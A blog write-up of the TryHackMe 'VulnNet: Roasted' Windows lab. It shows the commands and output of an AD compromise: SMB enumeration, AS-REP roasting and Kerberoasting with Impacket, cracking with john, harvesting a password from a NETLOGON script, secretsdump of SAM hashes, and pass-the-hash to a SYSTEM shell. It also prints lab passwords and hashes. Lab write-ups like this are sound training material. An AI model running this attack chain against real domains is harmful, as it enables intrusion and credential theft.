THM: VulnNet: Roasted
THM: VulnNet: Roasted
This is VulnNet: Roasted from THM. It’s rated as Easy but it’s … drum roll … Windows. Which I’m not very experienced at. I mean I use it all the time, but hacking? Not so much.
Just as an aside, I’ve had so much trouble getting recent VulnHub machines to work. Half of them don’t want to get an IP. I even tried installing Kali as the main OS on an old laptop to try some different options but it didn’t seem to help.
Anyway, back to Roasted. I assume it refers to Kerberoasting. It says:
This is a much simpler machine, do not overthink. You can do it by following common methodologies.
Ports
Typical Windows; So. Many. Ports.
- 53/tcp open domain syn-ack ttl 127
- 88/tcp open kerberos-sec syn-ack ttl 127
- 135/tcp open msrpc syn-ack ttl 127
- 139/tcp open netbios-ssn syn-ack ttl 127
- 389/tcp open ldap syn-ack ttl 127
- 445/tcp open microsoft-ds syn-ack ttl 127
- 464/tcp open kpasswd5 syn-ack ttl 127
- 593/tcp open http-rpc-epmap syn-ack ttl 127
- 636/tcp open ldapssl syn-ack ttl 127
- 3268/tcp open globalcatLDAP syn-ack ttl 127
- 3269/tcp open globalcatLDAPssl syn-ack ttl 127
- 5985/tcp open wsman syn-ack ttl 127
- 49665/tcp open unknown syn-ack ttl 127
- 49667/tcp open unknown syn-ack ttl 127
- 49669/tcp open unknown syn-ack ttl 127
- 49670/tcp open unknown syn-ack ttl 127
- 49673/tcp open unknown syn-ack ttl 127
SMB
Let’s start there. We’ll try to see if there are any shares:
──(root💀kali)-[/opt/thm/vulnroasted]
└─# smbclient -L //10.10.47.100/
Enter WORKGROUP\root's password:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
VulnNet-Business-Anonymous Disk VulnNet Business Sharing
VulnNet-Enterprise-Anonymous Disk VulnNet Enterprise SharingOkay good, let’s try something else:
┌──(root💀kali)-[/opt/thm/vulnroasted]
└─# crackmapexec smb --shares 10.10.47.100
SMB 10.10.47.100 445 WIN-2BO8M1OE1M1 [*] Windows 10.0 Build 17763 x64 (name:WIN-2BO8M1OE1M1) (domain:vulnnet-rst.local) (signing:True) (SMBv1:False)
SMB 10.10.47.100 445 WIN-2BO8M1OE1M1 [-] Error enumerating shares: SMB SessionError: STATUS_USER_SESSION_DELETED(The remote user session has been deleted.)Bummer. What about impacket?
┌──(root💀kali)-[/opt/thm/vulnroasted]
└─# smbclient.py 10.10.47.100
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
Type help for list of commands
# shares
[-] SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)
# exitBalls. Back to smbclient?
┌──(root💀kali)-[/opt/thm/vulnroasted]
└─# smbclient //10.10.47.100/VulnNet-Business-Anonymous
Enter WORKGROUP\root's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Fri Mar 12 21:46:40 2021
.. D 0 Fri Mar 12 21:46:40 2021
Business-Manager.txt A 758 Thu Mar 11 20:24:34 2021
Business-Sections.txt A 654 Thu Mar 11 20:24:34 2021
Business-Tracking.txt A 471 Thu Mar 11 20:24:34 2021Works just fine. Between this one and the other share I get six text files, which gives me four user names. But they are full names, with proper capitalisation. We probably need to turn these into usernames, but I don’t know exactly what they will look like. I use Burp Suite CO2 Name Mangler and get a selection like so:
A-WHITEHAT
A-whitehat
A.WHITEHAT
A.whitehat
ALEXA
AWHITEHAT
And so on. You get the idea.
I run this with GetNPUsers:
──(root💀kali)-[/opt/thm/vulnroasted]
└─# GetNPUsers.py vulnnet-rst.local/ -usersfile dumblist -dc-ip 10.10.47.100 -format john -outputfile output.txt
/usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
# etc
[-] User A-WHITEHAT doesn't have UF_DONT_REQUIRE_PREAUTH set
# etcAnd that reveals our username format. I prune the user list and run it again:
┌──(root💀kali)-[/opt/thm/vulnroasted]
└─# GetNPUsers.py vulnnet-rst.local/ -usersfile users -dc-ip 10.10.47.100 -format john -outputfile output.txt
/usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[-] User J-Goldenhand doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User A-Whitehat doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User J-Leet doesn't have UF_DONT_REQUIRE_PREAUTH setBut didn’t I have four users? Yes:
┌──(root💀kali)-[/opt/thm/vulnroasted]
└─# cat output.txt
$krb5asrep$T-Skid@VULNNET-RST.LOCAL:c92827 # AND SO ONWe can crack that:
──(root💀kali)-[/opt/thm/vulnroasted]
└─# john output.txt -w=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
tj072889* ($krb5asrep$T-Skid@VULNNET-RST.LOCAL)
1g 0:00:00:05 DONE (2021-05-16 05:50) 0.1953g/s 620800p/s 620800c/s 620800C/s tj3929..tj0216044
Use the "--show" option to display all of the cracked passwords reliably
Session completedAnd run it with GetUserSPNs.py:
┌──(root💀kali)-[/opt/thm/vulnroasted]
└─# GetUserSPNs.py VULNNET-RST.LOCAL/T-Skid:'tj072889*' -dc-ip 10.10.47.100 -request
/usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
---------------------- ------------------ ------------------------------------------------------------- -------------------------- -------------------------- ----------
CIFS/vulnnet-rst.local enterprise-core-vn CN=Remote Management Users,CN=Builtin,DC=vulnnet-rst,DC=local 2021-03-11 14:45:09.913979 2021-03-13 18:41:17.987528
$krb5tgs$23$*enterprise-core-vn$VULNNET-RST.LOCAL$VULNNET-RST.LOCAL/enterprise-core-vn*$9527c3a493bb1c4 # AND SO ONAnd then we can crack that:
┌──(root💀kali)-[/opt/thm/vulnroasted]
└─# john request -w=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
ry=ibfkfv,s6h, (?)
1g 0:00:00:03 DONE (2021-05-16 05:54) 0.2590g/s 1064Kp/s 1064Kc/s 1064KC/s ryan0318..ry=iIyD{N
Use the "--show" option to display all of the cracked passwords reliably
Session completedWew. Now what?
Backtrack
We go backwards, because enterprise-core-vn doesn’t help us; and yes, I tried.
If we enumerate more as our first user:
┌──(root💀kali)-[/opt/thm/vulnroasted/evil-winrm]
└─# python3 /opt/impacket/examples/smbclient.py VULNNET-RST.LOCAL/T-Skid:'tj072889*'@10.10.127.110
Impacket v0.9.23.dev1+20210504.123629.24a0ae6f - Copyright 2020 SecureAuth Corporation
Type help for list of commands
# shares
ADMIN$
C$
IPC$
NETLOGON
SYSVOL
VulnNet-Business-Anonymous
VulnNet-Enterprise-Anonymous
# use netlogon
# ls
drw-rw-rw- 0 Tue Mar 16 19:15:49 2021 .
drw-rw-rw- 0 Tue Mar 16 19:15:49 2021 ..
-rw-rw-rw- 2821 Tue Mar 16 19:18:14 2021 ResetPassword.vbs
# get ResetPassword.vbs
# exitWe find an interesting file, with some interesting information:
┌──(root💀kali)-[/opt/thm/vulnroasted]
└─# cat ResetPassword.vbs
Option Explicit
Dim objRootDSE, strDNSDomain, objTrans, strNetBIOSDomain
Dim strUserDN, objUser, strPassword, strUserNTName
' Constants for the NameTranslate object.
Const ADS_NAME_INITTYPE_GC = 3
Const ADS_NAME_TYPE_NT4 = 3
Const ADS_NAME_TYPE_1779 = 1
If (Wscript.Arguments.Count <> 0) Then
Wscript.Echo "Syntax Error. Correct syntax is:"
Wscript.Echo "cscript ResetPassword.vbs"
Wscript.Quit
End If
strUserNTName = "a-whitehat"
strPassword = "bNdKVkjv3RR9ht"
' Determine DNS domain name from RootDSE object.
# etcWhat can we do with this? Get some secrets:
┌──(root💀kali)-[/opt/thm/vulnroasted/evil-winrm]
└─# python3 /opt/impacket/examples/secretsdump.py VULNNET-RST.LOCAL/a-whitehat:'bNdKVkjv3RR9ht'@10.10.127.110 1 ⨯
Impacket v0.9.23.dev1+20210504.123629.24a0ae6f - Copyright 2020 SecureAuth Corporation
[*] Target system bootKey: 0xf10a2788aef5f622149a41b2c745f49a
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c2597747aa5e43022a3a3049a3c3b09d:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
# etcAnd with that, we can get System:
┌──(root💀kali)-[/opt/thm/vulnroasted]
└─# python3 /opt/impacket/examples/wmiexec.py VULNET-RST.local/Administrator@10.10.127.110 -hashes aad3b435b51404eeaad3b435b51404ee:c2597747aa5e43022a3a3049a3c3b09d
Impacket v0.9.23.dev1+20210504.123629.24a0ae6f - Copyright 2020 SecureAuth Corporation
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>type C:\Users\Administrator\Desktop\system.txt
THM{REDACTED}
C:\>Wew lad.